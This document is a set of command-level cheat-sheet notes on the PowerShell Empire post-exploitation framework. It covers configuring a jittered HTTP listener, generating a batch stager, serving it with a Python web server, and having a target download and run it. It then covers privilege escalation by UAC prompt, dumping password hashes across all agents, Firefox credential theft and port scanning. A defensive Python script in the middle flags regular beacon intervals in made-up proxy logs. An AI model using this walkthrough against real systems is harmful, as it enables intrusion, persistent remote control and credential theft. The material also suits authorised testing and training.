# PowerShell Empire

## Modules:

* PowerBreach: Persistence
* Posh-SecMod: Discovery
* PowerSploit: CodeEx, Keylog, etc.
* PowerUp: privesc
* PowerView: Enum, includes "Find Interesting Files"

### Module Categories:

* CodeEx
* Coll
* Exfil
* Expl
* Fun
* Lateral

### More Module Categories:

* Management: email/runas/hash
* Persistence: tasksched/reg/script
* Recon: Enum
* SitAwareness: scan/netstat
* Trollsploit: RickRoll fun

## Getting Started

```
Linux:
cd /opt/empire/setup
sudo ./reset.sh   ..cleanup previous history

Normal start:
sudo ./empire

Empire term = Metasploit equivalent:
agents    = sessions
info      = show options
listeners = multihandler
```

## Module

```
searchmodule privesc
listeners
?  ..help for listeners
```

## Listener

```
uselistener  ..<tab-complete>
uselistener http
info

DefaultJitter  ..give us irregular checks(to hide)
KillDate       ..quit on date
WorkingHours   ..goes silent after time
SlackChannel   ..notifs in Slack

set DefaultDelay 1   ..to make commands faster
set Host http://10.x.x.x:8080
set Port 8080   ..quirky, but set both Host and Port
info
?   ..help
execute
listener successfully started (like: multihandler)

listeners  ..view current listeners
.. note: could rename from 'http'
```
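The DefaultDelay/DefaultJitter options above exist to make the agent's check-ins look irregular, but jittered intervals still cluster tightly around the base delay. As an added defender-side example (not from these notes and not Empire's own code), the script below groups constructed proxy log lines by client and destination and flags pairs whose request intervals are numerous and unusually regular; the log format, addresses and timings are made up for the demo.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log ("<iso-ts> <src-ip> <method> <url>"), not real traffic:
# 10.0.0.5 checks in to a listener on 10.1.2.3:8080 with DefaultDelay 5 and
# DefaultJitter 0.3 (gaps of 3.5-6.5 s); 10.0.0.7 is a person browsing.
PROXY_LOG = """\
2024-01-01T10:00:00 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:05 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:09 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:15 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:20 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:24 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:30 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:35 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:39 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:45 10.0.0.5 GET http://10.1.2.3:8080/index.php
2024-01-01T10:00:03 10.0.0.7 GET http://intranet.example/
2024-01-01T10:00:50 10.0.0.7 GET http://intranet.example/news
2024-01-01T10:00:51 10.0.0.7 GET http://intranet.example/news/1
2024-01-01T10:02:13 10.0.0.7 GET http://intranet.example/hr
2024-01-01T10:02:14 10.0.0.7 GET http://intranet.example/hr/forms
2024-01-01T10:02:15 10.0.0.7 GET http://intranet.example/hr/forms/1
2024-01-01T10:06:43 10.0.0.7 GET http://intranet.example/logout
"""
LINE_RE = re.compile(r"^(\S+) (\S+) \S+ \w+://([^/\s]+)")

def find_beacons(log, min_hits=6, max_cov=0.35):
    """Return {(src, dest): (mean_gap_s, cov)} for pairs with regular check-ins."""
    seen = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, dest = m.groups()
            seen[(src, dest)].append(datetime.fromisoformat(ts))
    flagged = {}
    for pair, stamps in seen.items():
        if len(stamps) < min_hits:
            continue  # too few requests to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cov = statistics.stdev(gaps) / mean if mean else float("inf")  # spread relative to delay
        if cov <= max_cov:  # jitter of 0.3 keeps CoV near 0.17; browsing is far above 1
            flagged[pair] = (round(mean, 2), round(cov, 3))
    return flagged

if __name__ == "__main__":
    print(find_beacons(PROXY_LOG))
```

Tune `max_cov` against your own baseline; a short DefaultDelay makes the pattern obvious, while a long delay needs a longer log window to reach `min_hits`.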

## Stager

```
back
usestager  ..<tab-complete>

.. windows/hta   ..good to get past email filters
.. windows/macro ..good to use in Word

usestager windows/launcher_bat
info
set Listener http  ..choose our current
generate           ..created /tmp/launcher.bat

---------------------------------------------------------------
Share with Python:
python3 -m http.server

---------------------------------------------------------------
Windows/Target
Download with Windows PowerShell:

PS> cd .\Desktop\
PS> wget http://x.x.x.x:8000/launcher.bat -OutFile launcher.bat
PS> dir
PS> notepad ./launcher.bat
Desktop > double-click launcher.bat
```

## Connected

```
Linux: Empire now shows connected!!

agents
interact ABC123SESS
rename Agent1
info  ..hostname, user, process, etc

list listeners
list agents
```

## Doing more

```
usemodule <tab>
usemodule situational_awareness/host/winenum
.. also cool: collection/FoxDump  ..firefox cred dump

searchmodule powerup
usemodule privesc/powerup/allchecks

.. Found Unquoted service paths
.. Exe has poor perms
.. Some false-positives
```

## Elevated Modules

```
back
usemodule powershell/credentials/powerdump*
.. * marks modules that need an elevated (higher-priv) agent

info
run   ..error, needs to run in elevated
```

## PrivEsc Modules

```
back
usemodule privesc/ask  ..will prompt user to accept
.. Unless UAC is set to allow everything

set Listener http
run

agents
.. we now have a * (higher priv) agent
rename 8VDM9S2G AgentHIGH
```

## Powerdump

```
interact AgentHIGH
usemodule credentials/powerdump*
password-hashes!!

back
shell ipconfig
shell whoami
```

## Portscan

```
searchmodule portscan
usemodule situational_awareness/network/portscan
info
set Hosts 10.x.x.x
run
```

## All Agents - Powerful

```
usemodule powershell/credentials/powerdump
info
set Agent all   ..to run on ALL agents
execute
```

## Cleanup

```
agents
kill all
listeners
kill http
exit

cd /opt/empire/downloads/
cd AgentHIGH
less agent.log  ..LOG of everything and outputs !!!!

cd /opt/empire/setup
sudo ./reset.sh   ..cleanup previous history
```
